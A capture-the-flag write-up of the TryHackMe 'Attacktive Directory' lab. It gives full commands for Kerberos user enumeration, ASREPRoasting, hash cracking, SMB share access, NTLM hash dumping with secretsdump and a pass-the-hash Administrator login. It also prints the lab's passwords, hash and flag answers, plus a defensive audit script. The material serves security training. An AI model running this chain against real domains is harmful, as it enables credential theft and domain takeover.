TRYHACKME ATTACKTIVE DIRECTORY ROOM WRITE-UP
On connection
Running nmap to view open ports and services
Add the dns domain name to the /etc/hosts then access the IP via the browser
On the browser:
This is IIS from Microsoft.
Try to enumerate any user using the enum4linux tool
We got nothing
Installing the tool kerbrute for enumeration
The tool's help output shows the commands used to enumerate different items, e.g. users through userenum, with --dc <ip address>, -d <domain name> and a list of common usernames.
Command:
./kerbrute_linux_amd64 userenum --dc 10.10.61.114 -d spookysec.local userlist.txt
The tool returns the usernames from userlist.txt that exist in the domain.
We can now use the tool impacket to enumerate users as well as do ASREPRoasting.
ASREPRoasting is possible when a user account has the "Does not require Kerberos preauthentication" setting enabled. This means that nobody needs to prove knowledge of the account's password before requesting an AS-REP for that account, and the ticket material returned can then be cracked offline.
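From the defender's side, the setting described above is a single bit in the account's userAccountControl attribute. The following Python check is an added example, not part of the original write-up: it flags accounts with that bit set over constructed sample records (the account names and values are made up, not room data) and shows the remediated value.

```python
# Added example (not from the original write-up): audit user records for the
# "Does not require Kerberos preauthentication" setting that enables ASREPRoasting.
# UF_DONT_REQUIRE_PREAUTH (0x400000) and UF_ACCOUNTDISABLE (0x0002) are the
# documented userAccountControl bits; the account records below are constructed.

DONT_REQ_PREAUTH = 0x400000   # UF_DONT_REQUIRE_PREAUTH
ACCOUNTDISABLE = 0x0002       # UF_ACCOUNTDISABLE

# LDAP filter (bitwise AND matching rule) to run the same check against a real DC.
LDAP_FILTER = ("(&(objectCategory=person)(objectClass=user)"
               "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")

# Constructed sample records in the shape of sAMAccountName / userAccountControl.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "Administrator", "userAccountControl": 0x10200},
    {"sAMAccountName": "svc-admin", "userAccountControl": 0x410200},  # preauth not required
    {"sAMAccountName": "backup", "userAccountControl": 0x10200},
    {"sAMAccountName": "old-svc", "userAccountControl": 0x410202},    # flag set, but disabled
]


def preauth_not_required(uac: int) -> bool:
    """True if the KDC will answer an AS-REQ for this account without preauthentication."""
    return bool(uac & DONT_REQ_PREAUTH)


def find_asrep_roastable(accounts, include_disabled=False):
    """Return sAMAccountNames whose userAccountControl has DONT_REQ_PREAUTH set.

    Disabled accounts are skipped by default because the KDC does not issue
    tickets for them, so they are not exposed until re-enabled.
    """
    hits = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        if not preauth_not_required(uac):
            continue
        if not include_disabled and uac & ACCOUNTDISABLE:
            continue
        hits.append(acct["sAMAccountName"])
    return hits


def remediated_uac(uac: int) -> int:
    """userAccountControl with the preauth exemption cleared (the fix for the finding)."""
    return uac & ~DONT_REQ_PREAUTH


if __name__ == "__main__":
    for name in find_asrep_roastable(SAMPLE_ACCOUNTS):
        print(f"{name}: Kerberos preauthentication not required")
```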
The script is GetNPUsers.py
Command: GetNPUsers.py spookysec.local/ -usersfile userenum.txt -format hashcat -outputfile ./getnpusers -dc-ip 10.10.61.114
Checking the content of the output file
We identify that only the user svc-admin is susceptible to ASREPRoasting.
We then make use of hashcat to crack the hash and get the password
Password = management2005
Alternatively, one can use John the Ripper to crack it, which is simpler.
Get SMB shares using SMB client tool
Command: smbclient -L //10.10.61.114 -U svc-admin
When prompted for a password, use the one we found above for the svc-admin user.
Try to access the shares one by one to find out which ones you are allowed to access. In this case, we are allowed to access the backup share.
Command: smbclient -U svc-admin //10.10.61.114/backup
Use the more command to read the content of the file.
Output:
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decode the base64 to get the credentials.
Command: echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
The decoded string is backup@spookysec.local:backup2517860, so the user is backup@spookysec.local and the password is backup2517860.
Dump the hashes for all users.
Command: secretsdump.py spookysec.local/backup:'backup2517860'@10.10.61.114 -just-dc-ntlm
The interesting user and hash:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
We can now use evil-winrm to log in as the user without having to crack the hash (pass-the-hash).
Command: evil-winrm -i 10.10.61.114 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Now logged in, find out where you are in the system.
Navigate through and look for the flag.
It is in the Desktop directory, in a file named root.txt.
Flag for administrator= TryHackMe{4ctiveD1rectoryM4st3r}
Move to the Users directory and go into each user's directory to find the flags.
Flag for svc-admin = TryHackMe{K3rb3r0s_Pr3_4uth}
Flag for backup = TryHackMe{B4ckM3UpSc0tty!}
Have fun!!